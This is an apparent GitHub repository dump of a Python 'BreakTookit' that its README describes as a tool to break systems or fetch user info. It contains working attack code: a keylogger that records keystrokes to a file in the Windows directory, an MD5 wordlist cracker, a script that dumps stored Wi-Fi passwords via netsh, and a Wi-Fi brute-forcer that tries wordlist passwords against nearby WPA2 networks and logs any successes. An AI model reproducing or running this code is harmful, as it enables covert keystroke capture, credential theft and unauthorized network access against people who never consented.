├── .gitignore ├── README.md ├── keylogger.py ├── md5crash.py ├── Base.py ├── getWifiPassword.py └── wifi_crack.py /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | *.pyc 3 | *.txt 4 | dict/ 5 | *.log -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BreakTookit 2 | Useful tool to break system or fetch user info 3 | Keep on update on this project 4 | ---- 5 | * getWifiPassword.py Get system stored wifi password 6 | * md5crash.py Crash md5 hash by file 7 | * keylogger.py record your keyboad typing -------------------------------------------------------------------------------- /keylogger.py: -------------------------------------------------------------------------------- 1 | #-*-coding=utf-8-*- 2 | from pynput.keyboard import Key,Listener 3 | import logging 4 | import os 5 | 6 | log_dir = os.environ['WINDIR'] 7 | #log_dir = '' 8 | print log_dir 9 | print os.access(log_dir,os.W_OK) 10 | 11 | logging.basicConfig(filename=os.path.join(log_dir,'keylog.txt'),level=logging.DEBUG,format='%(asctime)s: %(message)s') 12 | def on_press(key): 13 | logging.info(key) 14 | 15 | with Listener(on_press=on_press) as listener: 16 | listener.join() 17 | -------------------------------------------------------------------------------- /md5crash.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | # crash md5 hash password 3 | 4 | import hashlib 5 | 6 | import os 7 | 8 | 9 | def md5cracker(hash_string,raw_file): 10 | count = 1 11 | hash_string=hash_string.lower() 12 | try: 13 | f = open(raw_file, 'r') 14 | for i in f.readlines(): 15 | if hash_string == hashlib.md5(i.strip()).hexdigest(): 16 | print "Password is {} !!! Found on loop {}".format(i.strip(), count) 17 | return 18 | else: 19 | print "Not found on loop {}".format(count) 20 | count += 1 21 | except Exception, e: 22 | print e 23 | exit() 24 | 25 | hash_string = raw_input('Please input hash string that you want to crack: ') 26 | raw_file = os.path.join(os.getcwd(),'dict','rkolin_all.txt') 27 | md5cracker(hash_string,raw_file) 28 | -------------------------------------------------------------------------------- /Base.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import time 3 | 4 | class BaseServices(object): 5 | 6 | def get_lloger(self,filename='default.log'): 7 | logger = logging.getLogger(filename) # 不加名称设置root logger 8 | 9 | logger.setLevel(logging.DEBUG) # 设置输出级别 10 | 11 | formatter = logging.Formatter( 12 | '[%(asctime)s][%(filename)s][line: %(lineno)d]\[%(levelname)s] ## %(message)s)', 13 | datefmt='%Y-%m-%d %H:%M:%S') 14 | 15 | # 使用FileHandler输出到文件 16 | fh = logging.FileHandler(filename) 17 | fh.setLevel(logging.DEBUG) 18 | fh.setFormatter(formatter) 19 | 20 | # 使用StreamHandler输出到屏幕 21 | ch = logging.StreamHandler() 22 | ch.setLevel(logging.DEBUG) 23 | ch.setFormatter(formatter) 24 | 25 | # 添加两个Handler 26 | logger.addHandler(ch) 27 | logger.addHandler(fh) 28 | return logger 29 | -------------------------------------------------------------------------------- /getWifiPassword.py: -------------------------------------------------------------------------------- 1 | #-*-coding=utf-8-*- 2 | import subprocess 3 | 4 | # get system store wifi password 5 | 6 | def getwifipassword(): 7 | cmd = 'netsh wlan show profiles' 8 | p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True) 9 | ret = p.stdout.readlines() 10 | profile = [i.split(':')[1].strip() for i in ret if 'All User Profile' in i] 11 | cmd_pwd = 'netsh wlan show profile {} key=clear' 12 | ap_password={} 13 | for ap in profile: 14 | p = subprocess.Popen(cmd_pwd.format(ap), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 15 | ret = p.stdout.readlines() 16 | password = [i.split(':')[1].strip() for i in ret if 'Key Content' in i] 17 | if not password: 18 | ap_password[ap]='' 19 | else: 20 | ap_password[ap]=password[0] 21 | return ap_password 22 | 23 | 24 | print getwifipassword() -------------------------------------------------------------------------------- /wifi_crack.py: -------------------------------------------------------------------------------- 1 | # 扫描wifi 2 | import time 3 | from pywifi import const 4 | import pywifi 5 | from Base import BaseServices 6 | 7 | DEFAULT = 3.4 8 | 9 | class WIFI(BaseServices): 10 | 11 | def __init__(self): 12 | self.logger = self.get_lloger() 13 | self.wifi=pywifi.PyWiFi() 14 | self.iface = self.wifi.interfaces()[1] 15 | self.password_list = self.get_password() 16 | self.ignore_list=self.get_ignore() 17 | print(self.ignore_list) 18 | 19 | 20 | def get_ignore(self): 21 | ignore_list = None 22 | with open('ignore_list.txt','r') as f: 23 | ignore_list=f.readlines() 24 | 25 | if ignore_list: 26 | ignore_l=[i.strip() for i in ignore_list] 27 | 28 | return ignore_l 29 | 30 | def get_password(self): 31 | 32 | password_list=[] 33 | path = r'C:\git\workspace\weak_dict.txt' 34 | with open(path,'r') as f: 35 | password_list = f.readlines() 36 | 37 | return password_list 38 | 39 | def start(self): 40 | 41 | basewifi = self.scan(10) 42 | 43 | if self.wifi_connect_status: 44 | # 断开 45 | # self.disconnect() 46 | pass 47 | 48 | print(len(basewifi)) 49 | ssid_list = [] 50 | for i in basewifi: 51 | 52 | try: 53 | 54 | print(i.ssid+'\n') 55 | if len(i.ssid.strip())<1: 56 | continue 57 | 58 | ssid_list.append(i.ssid) 59 | except Exception as e: 60 | print(e) 61 | 62 | 63 | ssid_set = set(ssid_list) 64 | 65 | for i in ssid_set: 66 | if i in self.ignore_list: 67 | continue 68 | print('wifi 扫描结果:{}'.format(i)) 69 | print('wifi 对应设备的MAC地址: {}'.format(i)) 70 | print('='*10) 71 | found =False 72 | for p in self.password_list: 73 | 74 | if self.connect(i,p.strip()): 75 | found =True 76 | break 77 | else: 78 | pass 79 | if not found: 80 | print('not found') 81 | try: 82 | with open('ignore_list.txt','a') as f: 83 | f.write(i+'\n') 84 | except Exception as e: 85 | print(e) 86 | pass 87 | 88 | 89 | def wifi_connect_status(self): 90 | if self.iface.status() in [const.IFACE_CONNECTED,const.IFACE_INACTIVE]: 91 | return True 92 | else: 93 | return False 94 | 95 | def scan(self,sleep_time=DEFAULT): 96 | self.iface.scan() 97 | time.sleep(sleep_time) 98 | basewifi = self.iface.scan_results() 99 | return basewifi 100 | 101 | def connect(self,ssid,password,sleep_time=DEFAULT): 102 | profile = pywifi.Profile() 103 | profile.ssid=ssid 104 | profile.auth=const.AUTH_ALG_OPEN 105 | profile.akm.append(const.AKM_TYPE_WPA2PSK) 106 | profile.cipher=const.CIPHER_TYPE_CCMP 107 | profile.key=password 108 | self.iface.remove_all_network_profiles() 109 | current_profile = self.iface.add_network_profile(profile) 110 | self.iface.connect(current_profile) 111 | 112 | time.sleep(sleep_time) 113 | 114 | if self.wifi_connect_status(): 115 | 116 | self.logger.info(f'{ssid} 连接成功') 117 | self.logger.info(f'{ssid}的密码是{password}') 118 | return True 119 | 120 | else: 121 | # print('连接失败') 122 | # self.fp.write(ssid+'\n') 123 | return False 124 | 125 | def disconnect(self,sleep_time=DEFAULT): 126 | self.iface.disconnect() 127 | time.sleep(sleep_time) 128 | 129 | if __name__ == "__main__": 130 | wifi = WIFI() 131 | # wifi.scan() 132 | # wifi.disconnect() 133 | # wifi.connect() 134 | wifi.start() --------------------------------------------------------------------------------